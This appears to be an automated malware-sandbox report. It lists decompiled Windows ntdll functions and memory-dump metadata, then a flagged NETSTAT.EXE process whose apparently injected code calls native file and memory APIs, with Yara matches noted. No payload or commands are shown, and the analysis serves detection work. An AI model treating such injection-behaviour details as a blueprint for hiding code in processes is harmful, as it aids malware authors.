                                                  0x007b23a2
                                                  0x007b23a3
                                                  0x007b23a6
                                                  0x007b23ab
                                                  0x007b23ad
                                                  0x00000000
                                                  0x007b23b3
                                                  0x007b23b3
                                                  0x007b23b4
                                                  0x007b23b9
                                                  0x007b23ba
                                                  0x007b23ba
                                                  0x007b23bc
                                                  0x007b23bf
                                                  0x00000000
                                                  0x00000000
                                                  0x007a9153
                                                  0x007a9158
                                                  0x007a915a
                                                  0x007a915e
                                                  0x007a9160
                                                  0x00000000
                                                  0x007a9166
                                                  0x007a9166
                                                  0x007a9171
                                                  0x007a9176
                                                  0x007a9176
                                                  0x00000000
                                                  0x007a9160
                                                  0x007b23c6
                                                  0x007b23ce
                                                  0x007b23d7
                                                  0x007b23d7
                                                  0x007b23ad
                                                  0x007b2390
                                                  0x007b2373
                                                  0x007b233f
                                                  0x007b233f
                                                  0x00000000
                                                  0x007b233f
                                                  0x007b2291
                                                  0x007b2291
                                                  0x007b2293
                                                  0x007b2295
                                                  0x007b229a
                                                  0x007b22a1
                                                  0x007b22a3
                                                  0x007b22a7
                                                  0x007b22a9
                                                  0x00000000
                                                  0x00000000
                                                  0x007b22ab
                                                  0x007b22ad
                                                  0x007b22af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x007b22af
                                                  0x007b22b1
                                                  0x007b22b4
                                                  0x007b22b4
                                                  0x007b22b6
                                                  0x007753be
                                                  0x007753be
                                                  0x007753be
                                                  0x007753c0
                                                  0x00000000
                                                  0x00000000
                                                  0x007753cb
                                                  0x007753ce
                                                  0x007753d0
                                                  0x007753d4
                                                  0x007753d6
                                                  0x00000000
                                                  0x007753d8
                                                  0x007753e3
                                                  0x007753ea
                                                  0x007753ea
                                                  0x00000000
                                                  0x007753d6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x007b22b6
                                                  0x00000000
                                                  0x007b228f
                                                  0x007b2349
                                                  0x007b234d
                                                  0x007b2251
                                                  0x007b2251
                                                  0x00000000
                                                  0x007b2251
                                                  0x007b21a4
                                                  0x007b21a4
                                                  0x007b21a6
                                                  0x007b21a8
                                                  0x007b21ac
                                                  0x007b21b6
                                                  0x007b21b8
                                                  0x007b21bc
                                                  0x007b21be
                                                  0x00000000
                                                  0x00000000
                                                  0x007b21c0
                                                  0x007b21c2
                                                  0x007b21c4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x007b21c4
                                                  0x007b21c6
                                                  0x007b21c6
                                                  0x007b21c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x007b21c8
                                                  0x007b21a2
                                                  0x00000000
                                                  0x007b2183
                                                  0x0079057b
                                                  0x0079057d
                                                  0x00790581
                                                  0x00790583
                                                  0x007b2178
                                                  0x00000000
                                                  0x00790589
                                                  0x0079058f
                                                  0x0079058f
                                                  0x00790583
                                                  0x00000000

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B2206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-4236105082
                                                  • Opcode ID: 7bac8249b0c8a9c0adcf57aa208406712ee3091931d9a57119103de46ffa3001
                                                  • Instruction ID: a62f9aeb2d7069c87f0c8695fbf6f89927c9fdf10379f9a1149d0bfdbfc04e07
                                                  • Opcode Fuzzy Hash: 7bac8249b0c8a9c0adcf57aa208406712ee3091931d9a57119103de46ffa3001
                                                  • Instruction Fuzzy Hash: B5513B71701205AFEB14CE18DC86FE633A9AB94715F218229FD54DF286DA79EC428B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007914C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E007914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x832088; // 0x75c40b8d
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00787707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E007913CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00787707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00787707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00752340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0075E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                  0x007914c0
                                                  0x007914cb
                                                  0x007914d2
                                                  0x007914d6
                                                  0x007914da
                                                  0x007914de
                                                  0x007914e3
                                                  0x0079157a
                                                  0x0079157a
                                                  0x007914f1
                                                  0x007914f3
                                                  0x007bea0f
                                                  0x00000000
                                                  0x007bea15
                                                  0x00000000
                                                  0x007bea15
                                                  0x007914f9
                                                  0x007914f9
                                                  0x007914fe
                                                  0x00791504
                                                  0x007bea1a
                                                  0x007bea1f
                                                  0x007bea21
                                                  0x007bea22
                                                  0x007bea27
                                                  0x007bea2a
                                                  0x007bea2a
                                                  0x00791515
                                                  0x00791517
                                                  0x0079156d
                                                  0x00791572
                                                  0x00791575
                                                  0x00791575
                                                  0x0079151e
                                                  0x007bea50
                                                  0x007bea55
                                                  0x007bea58
                                                  0x007bea58
                                                  0x0079152e
                                                  0x00791531
                                                  0x00791533
                                                  0x00000000
                                                  0x00791535
                                                  0x00791541
                                                  0x00791549
                                                  0x00791549
                                                  0x00791533
                                                  0x007914f3
                                                  0x00791559

                                                  APIs
                                                  • ___swprintf_l.LIBCMT ref: 007BEA22
                                                    • Part of subcall function 007913CB: ___swprintf_l.LIBCMT ref: 0079146B
                                                    • Part of subcall function 007913CB: ___swprintf_l.LIBCMT ref: 00791490
                                                  • ___swprintf_l.LIBCMT ref: 0079156D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 144638e4230dea4350305ae66896b8f0d4ca5483c8d557f8b048c0677100a2fa
                                                  • Instruction ID: 96b89cf3bec01f04af9cbe77cba7ec42d8354870ed29bebd58194497afea65b8
                                                  • Opcode Fuzzy Hash: 144638e4230dea4350305ae66896b8f0d4ca5483c8d557f8b048c0677100a2fa
                                                  • Instruction Fuzzy Hash: 0E21B17290061ADBCF20EE54DC45AEA73BCAB50701F964451FD46D3241EB78EA688BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B22F4
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 007B230B
                                                  • RTL: Re-Waiting, xrefs: 007B2328
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007B22FC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-871070163
                                                  • Opcode ID: 04aca1f3dfc21f5a97b8d802807952ca750117d8c36d0d8c53947b9835a3465f
                                                  • Instruction ID: 02c7fc60bc9a85a45c54080d51785a1ca7a64115a9cfeebe436c28a26a0413fa
                                                  • Opcode Fuzzy Hash: 04aca1f3dfc21f5a97b8d802807952ca750117d8c36d0d8c53947b9835a3465f
                                                  • Instruction Fuzzy Hash: 74513871601701ABDF10DF68DC85FE673D8EF59364F114229FD08DB282EAA9EC4287A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0077EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 007B248D
                                                  • RTL: Re-Waiting, xrefs: 007B24FA
                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007B24BD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                  • API String ID: 0-3177188983
                                                  • Opcode ID: d68769386fea6c23df6dc3977aec7ceaf7128c2ab3601c87ccb3d951986f5da0
                                                  • Instruction ID: fdd1458e19d5596474d745791ed4bc1c868b2ae8f575ddb117dc8854d8ff8cbe
                                                  • Opcode Fuzzy Hash: d68769386fea6c23df6dc3977aec7ceaf7128c2ab3601c87ccb3d951986f5da0
                                                  • Instruction Fuzzy Hash: 1541EAB0600204EFCB20DF64DC89FAA77A9EF44320F208655F9599B2D2D77CED428761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0078FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: __fassign
                                                  • String ID:
                                                  • API String ID: 3965848254-0
                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                  • Instruction ID: e17d25ff862f6ecf2e481b7dfc8cfda96a82f675a5a084accf6c44a3afb6e2d7
                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                  • Instruction Fuzzy Hash: 04917E71E4020AEFDF24EF98C8456EEB7B4FF95304F24807AD411E6262E7785A81CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007CE759, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • ]z, xrefs: 007CE75B
                                                  • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007CE893
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: _wcstoul
                                                  • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]z
                                                  • API String ID: 1097018459-692138959
                                                  • Opcode ID: 22096101cac878c8b58b99fe7b3c89fe8faaa74275e805e4d9121a8889f12b56
                                                  • Instruction ID: 98704757b1bf7d3b1d43f40b79b063f1c91a3ae380a81f271e84c71bdbbe11ba
                                                  • Opcode Fuzzy Hash: 22096101cac878c8b58b99fe7b3c89fe8faaa74275e805e4d9121a8889f12b56
                                                  • Instruction Fuzzy Hash: 71418972D00259EADF109FE4C885FEEB7F8AF05310F14946EE951A6081E778DA88DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0078C558, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0078C5BB
                                                  • 1u, xrefs: 0078C56F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: 1u${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                  • API String ID: 48624451-2845918265
                                                  • Opcode ID: 3cdadbe20c223b17f550228a1149506bf47735b8c2aa3b3073b02a6b79f7c637
                                                  • Instruction ID: 2e1af252c6bfde74edc154ef78057dbd59e86601467e82ba10d49215bfbca510
                                                  • Opcode Fuzzy Hash: 3cdadbe20c223b17f550228a1149506bf47735b8c2aa3b3073b02a6b79f7c637
                                                  • Instruction Fuzzy Hash: BF0184A60086B075D72197AB4C11873FBF99FCEA15728C08EF6D88A296E17FC542D770
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007CE8DB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcstoul.LIBCMT ref: 007CE901
                                                    • Part of subcall function 00805AA6: __cftof.LIBCMT ref: 00805AB6
                                                  Strings
                                                  • ]z, xrefs: 007CE8E3
                                                  • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007CE91B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: __cftof_wcstoul
                                                  • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]z
                                                  • API String ID: 1831096779-3069914341
                                                  • Opcode ID: 742ad109bcad250e78ca3d0c8ac9931ea8a963fde2bde0135e89c8484c32d008
                                                  • Instruction ID: 7271abb3115be30341293e42294f4173e88751ab5a9bc6884e00abcb88f94309
                                                  • Opcode Fuzzy Hash: 742ad109bcad250e78ca3d0c8ac9931ea8a963fde2bde0135e89c8484c32d008
                                                  • Instruction Fuzzy Hash: C5F0F037140204BAEB202A55EC07F9B77ACDF91B20F04821DFE059A191EAB9EA01CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: NETSTAT.EXE PID: 2076 Parent PID: 1764 NETSTAT.EXECOMMON

                                                  Executed Functions

                                                  Function 000985E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009862D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction ID: d974947f8607c91641fad38be63367c11d58baecb07bae07d4dd1839b0465e92
                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction Fuzzy Hash: EAF0BDB2204208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0009868A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:,FFFFFFFF,?,r=,?,00000000), ref: 000986D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1:
                                                  • API String ID: 2738559852-2258448488
                                                  • Opcode ID: d2c47d84e9376be424812f23f2f0025d2ad8ce6eac29cb11f4df72b6f4ed2e8b
                                                  • Instruction ID: c0eb2d94d96acc116d8e7beb8679975b9f89629e7a39747004cc8cbd32b646df
                                                  • Opcode Fuzzy Hash: d2c47d84e9376be424812f23f2f0025d2ad8ce6eac29cb11f4df72b6f4ed2e8b
                                                  • Instruction Fuzzy Hash: 7EF0E2B2200508ABCB14CF88DD81EEB77A9AF8C354F158249FA0DA7651C630E951CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00098690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:,FFFFFFFF,?,r=,?,00000000), ref: 000986D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1:
                                                  • API String ID: 2738559852-2258448488
                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction ID: f86b8a76bd5ff8a18cb67fcf4e6483e26bbf775c6d3bc2927acef1de83101bc1
                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction Fuzzy Hash: 77F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BE1D97251D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0009870A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(P=,?,?,00093D50,00000000,FFFFFFFF), ref: 00098735
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID: P=
                                                  • API String ID: 3535843008-2160658360
                                                  • Opcode ID: 0d964b8211e65c33f4f29550b0b3421b695354ce75aa7e4b355e4ac2cf3ceeb9
                                                  • Instruction ID: 20cb9277f4b2a62eb3b74e1e75ad205a5556b0f7c170da36a4df7ce5c60e5a8a
                                                  • Opcode Fuzzy Hash: 0d964b8211e65c33f4f29550b0b3421b695354ce75aa7e4b355e4ac2cf3ceeb9
                                                  • Instruction Fuzzy Hash: E1E08C726402246BD710EB988C49FD77BACEF48A90F154459FA589B242C530E600C6E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00098710, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(P=,?,?,00093D50,00000000,FFFFFFFF), ref: 00098735
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID: P=
                                                  • API String ID: 3535843008-2160658360
                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction ID: de9062268f43dde2ecf1bcf197ce4dd98b4428d4faa0f9dc1cc7191afb5d3919
                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction Fuzzy Hash: A3D01776200214ABDB10EBD8CC89EE77BACEF48760F154499BA189B242C530FA00C6E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000987C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000987F9
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction ID: 905e30491a69e896788ec325e9b6d3cf8735d1c684a77d8412869ee1a2058102
                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction Fuzzy Hash: 66F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148FE0897241C630F910CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000987BB, Relevance: 1.5, APIs: 1, Instructions: 26memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000987F9
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: c6b35efbc4dde36b7096f17ab43f726907049ef3f14fad3a81f9643c3ba431b3
                                                  • Instruction ID: 1cdccea4437c9ee0469aa83c4b948bfab3c4e5dc434cedbdd99c12ace1425f16
                                                  • Opcode Fuzzy Hash: c6b35efbc4dde36b7096f17ab43f726907049ef3f14fad3a81f9643c3ba431b3
                                                  • Instruction Fuzzy Hash: 7FF030B6114149AFCB14DF98DC84CA777ADBF88210B15864DFD4897212C634E815CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 022F00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
